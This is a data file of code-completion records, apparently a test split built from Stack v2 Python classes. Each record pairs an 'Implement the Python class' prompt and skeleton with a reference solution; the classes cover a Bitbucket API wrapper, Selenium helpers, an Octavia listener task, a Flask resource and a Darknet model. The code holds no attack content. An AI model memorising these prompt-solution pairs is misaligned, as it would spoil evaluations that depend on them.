"snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BitbucketCloudBase:\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n\n def get_link(self, link):\n \"\"\"Get a link from the data. 
:param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n", "source": "the_stack_v2_python_sparse", "source_path": "atlassian/bitbucket/cloud/base.py", "source_repo": "atlassian-api/atlassian-python-api", "split": "test", "star_events_count": 1130} {"blob_id": "dbebde59ed8a0e43fb4bbed39a6923d5ca52d483", "bodies": ["self.driver = driver\nself.by = by\nself.value = value\nself.locator = (self.by, self.value)\nself.webelement = None", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nreturn None", "element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\nself.webelement = element\nself.webelement.click()\nreturn None", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nreturn bool(self.webelement)", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nreturn self.webelement.is_enabled()", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nself.webelement.send_keys(text)\nreturn None"], "bodies_text": "<|body_start_0|>\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n<|end_body_0|>\n\n<|body_start_1|>\n element = WebDriverWait(self.driver, 
10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n<|end_body_2|>\n\n<|body_start_3|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n<|end_body_3|>\n\n<|body_start_4|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.is_enabled()\n<|end_body_4|>\n\n<|body_start_5|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n<|end_body_5|>\n", "class_docstring": "This represents the element", "class_name": "BaseElement", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n <|body_0|>\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n <|body_1|>\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n <|body_2|>\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n <|body_3|>\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n <|body_4|>\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n<|end_body_0|>\n\n<|body_start_1|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n<|end_body_2|>\n\n<|body_start_3|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n<|end_body_3|>\n\n<|body_start_4|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.is_enabled()\n<|end_body_4|>\n\n<|body_start_5|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000107", "length_bytes": 2273, "license_type": "no_license", "methods": [{"docstring": "This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value", "name": "__init__", "signature": "def __init__(self, driver, by, value)"}, {"docstring": "This 
is used to find the element :return:", "name": "find", "signature": "def find(self)"}, {"docstring": "This is used to click the element :return:", "name": "click", "signature": "def click(self)"}, {"docstring": "This is check whether element is visible :return: returns the boolean value", "name": "is_visible", "signature": "def is_visible(self)"}, {"docstring": "This is used to check whether element is enabled :return: returns the boolean value", "name": "is_enabled", "signature": "def is_enabled(self)"}, {"docstring": "This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing", "name": "enter_text", "signature": "def enter_text(self, text)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_003515", "prompt": "Implement the Python class `BaseElement` described below.\n\nClass description:\nThis represents the element\n\nMethod signatures and docstrings:\n- def __init__(self, driver, by, value): This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\n- def find(self): This is used to find the element :return:\n- def click(self): This is used to click the element :return:\n- def is_visible(self): This is check whether element is visible :return: returns the boolean value\n- def is_enabled(self): This is used to check whether element is enabled :return: returns the boolean value\n- def enter_text(self, text): This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing", "prompted_full_text": "Implement the Python class `BaseElement` described below.\n\nClass description:\nThis represents the element\n\nMethod signatures and docstrings:\n- def __init__(self, driver, by, value): This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\n- def find(self): This is used to find the element :return:\n- def click(self): This is used to click the element :return:\n- def is_visible(self): This is check whether element is visible :return: returns the boolean value\n- def is_enabled(self): This is used to check whether element is enabled :return: returns the boolean value\n- def enter_text(self, text): This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\n\n<|skeleton|>\nclass BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n <|body_0|>\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n <|body_1|>\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n <|body_2|>\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n <|body_3|>\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n <|body_4|>\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n<|end_body_0|>\n\n<|body_start_1|>\n element = WebDriverWait(self.driver, 
10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n<|end_body_2|>\n\n<|body_start_3|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n<|end_body_3|>\n\n<|body_start_4|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.is_enabled()\n<|end_body_4|>\n\n<|body_start_5|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n<|end_body_5|>\n", "revision_id": "2b7edfafc4e448bd558c034044570496ca68bf2d", "skeleton": "<|skeleton|>\nclass BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n <|body_0|>\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n <|body_1|>\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n <|body_2|>\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n <|body_3|>\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n <|body_4|>\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.is_enabled()\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and 
text to enter into the element :return: nothing\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "Page_Object_Model3_Amazon/base_element.py", "source_repo": "gsudarshan1990/Training_Projects", "split": "test", "star_events_count": 0} {"blob_id": "b22621c2824edd4d76205465293d585298c43cc6", "bodies": ["for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')", "LOG.warning('Reverting listeners updates.')\nfor listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\nreturn None"], "bodies_text": "<|body_start_0|>\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n<|end_body_0|>\n\n<|body_start_1|>\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n<|end_body_1|>\n", "class_docstring": "Task to update amphora with all specified listeners' configurations.", "class_name": "ListenersUpdate", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n <|body_0|>\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n<|end_body_0|>\n\n<|body_start_1|>\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000108", "length_bytes": 10501, "license_type": "permissive", "methods": [{"docstring": "Execute updates per listener for an amphora.", "name": "execute", "signature": "def execute(self, loadbalancer, listeners, vthunder)"}, {"docstring": "Handle 
failed listeners updates.", "name": "revert", "signature": "def revert(self, loadbalancer, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007311", "prompt": "Implement the Python class `ListenersUpdate` described below.\n\nClass description:\nTask to update amphora with all specified listeners' configurations.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer, listeners, vthunder): Execute updates per listener for an amphora.\n- def revert(self, loadbalancer, *args, **kwargs): Handle failed listeners updates.", "prompted_full_text": "Implement the Python class `ListenersUpdate` described below.\n\nClass description:\nTask to update amphora with all specified listeners' configurations.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer, listeners, vthunder): Execute updates per listener for an amphora.\n- def revert(self, loadbalancer, *args, **kwargs): Handle failed listeners updates.\n\n<|skeleton|>\nclass ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n <|body_0|>\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n<|end_body_0|>\n\n<|body_start_1|>\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n<|end_body_1|>\n", "revision_id": "dddb3e4695c38cbb72ecf7f99a8e746869590ae2", "skeleton": "<|skeleton|>\nclass ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n <|body_0|>\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n LOG.warning('Reverting listeners updates.')\n for 
listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "a10_octavia/controller/worker/tasks/handler_virtual_port.py", "source_repo": "richuc/a10-octavia", "split": "test", "star_events_count": 0} {"blob_id": "da4db204866d56b10b1ded6f77a52e4771a69d2a", "bodies": ["freigabe_info = request.json\ninserted_freigaben = []\nfor freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\nreturn inserted_freigaben", "freigabe_info = request.json\nfreigabe_info['last_updated'] = datetime.utcnow()\nfreigabe = Freigabe.find_by_id(freigabe_info['id'])\nif freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\nfreigabe.update(data=freigabe_info)\nreturn freigabe", "query = query_freigabe_parser.parse_args()\nclean_query = {k: v for k, v in query.items() if v is not None}\ndb_query = db.session.query(Freigabe)\nfor key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\nresults = db_query.all()\nreturn results"], "bodies_text": "<|body_start_0|>\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n<|end_body_0|>\n\n<|body_start_1|>\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n<|end_body_1|>\n\n<|body_start_2|>\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Freigaben", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Freigaben:\n\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n <|body_0|>\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n<|end_body_0|>\n\n<|body_start_1|>\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n<|end_body_1|>\n\n<|body_start_2|>\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000109", "length_bytes": 4017, "license_type": "no_license", "methods": [{"docstring": "Freigabeliste wird in die Datenbank 
hinzugefügt", "name": "post", "signature": "def post(self)"}, {"docstring": "Freigabe bearbeiten", "name": "put", "signature": "def put(self)"}, {"docstring": "Freigabe anzeigen", "name": "get", "signature": "def get(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004264", "prompt": "Implement the Python class `Freigaben` described below.\n\nClass description:\nImplement the Freigaben class.\n\nMethod signatures and docstrings:\n- def post(self): Freigabeliste wird in die Datenbank hinzugefügt\n- def put(self): Freigabe bearbeiten\n- def get(self): Freigabe anzeigen", "prompted_full_text": "Implement the Python class `Freigaben` described below.\n\nClass description:\nImplement the Freigaben class.\n\nMethod signatures and docstrings:\n- def post(self): Freigabeliste wird in die Datenbank hinzugefügt\n- def put(self): Freigabe bearbeiten\n- def get(self): Freigabe anzeigen\n\n<|skeleton|>\nclass Freigaben:\n\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n <|body_0|>\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n<|end_body_0|>\n\n<|body_start_1|>\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n<|end_body_1|>\n\n<|body_start_2|>\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n<|end_body_2|>\n", "revision_id": "8f1f0f9bb2a060aa5c32be320a6d2c955f442053", "skeleton": "<|skeleton|>\nclass Freigaben:\n\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n <|body_0|>\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Freigaben:\n def post(self):\n \"\"\"Freigabeliste wird in die Datenbank hinzugefügt\"\"\"\n freigabe_info = request.json\n inserted_freigaben = []\n for freigabe in freigabe_info:\n inserted_freigabe = Freigabe.create(freigabe_dict=freigabe)\n inserted_freigaben.append(inserted_freigabe)\n return inserted_freigaben\n\n def put(self):\n \"\"\"Freigabe bearbeiten\"\"\"\n freigabe_info = request.json\n freigabe_info['last_updated'] = datetime.utcnow()\n freigabe = Freigabe.find_by_id(freigabe_info['id'])\n if freigabe is None:\n abort(400, message='error.freigabe_bearbeiten')\n freigabe.update(data=freigabe_info)\n return freigabe\n\n def get(self):\n \"\"\"Freigabe anzeigen\"\"\"\n query = query_freigabe_parser.parse_args()\n clean_query = {k: v for k, v in query.items() if v is not None}\n db_query = db.session.query(Freigabe)\n for key in clean_query:\n db_query = db_query.filter(getattr(Freigabe, key) == clean_query[key])\n results = db_query.all()\n return results\n", 
"source": "the_stack_v2_python_sparse", "source_path": "app/api/freigaben.py", "source_repo": "hammadi3/freig", "split": "test", "star_events_count": 0} {"blob_id": "5f45935372d3cb33d0e21d88a390bcc90e986189", "bodies": ["super(Darknet, self).__init__()\nself.in_channels = in_ch\nself.batch_norm = batch_norm\nself.filters = filters\nself.stride_out_1 = 32\nself.stride_out_2 = 16\nself.stride_out_3 = 8\nindex = 0\nself.first_index = 0\nself.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\nindex += 1\nself.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\nindex = self.conv1.index_out + 1\nself.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\nindex = self.conv2.index_out + 1\nself.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\nindex = self.conv3.index_out + 1\nself.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\nindex = self.conv4.index_out + 1\nself.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\nindex = self.conv5.index_out + 1\nself.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\nindex = self.conv_low.index_out + 1\nself.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\nindex = self.conv_up1.index_out + 1\nself.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\nindex = self.conv_up2.index_out + 1\nself.last_index = index", "x0 = self.conv0(x)\nx1 = self.conv1(x0)\nx2 = self.conv2(x1)\nx3 = self.conv3(x2)\nx4 = self.conv4(x3)\nx5 = self.conv5(x4)\nx_out1 = self.conv_low(x5)\nx_out2 = self.conv_up1(x_out1, x_res=x4)\nx_out3 = self.conv_up2(x_out2, x_res=x3)\nreturn (x_out1, x_out2, x_out3)"], "bodies_text": "<|body_start_0|>\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, 
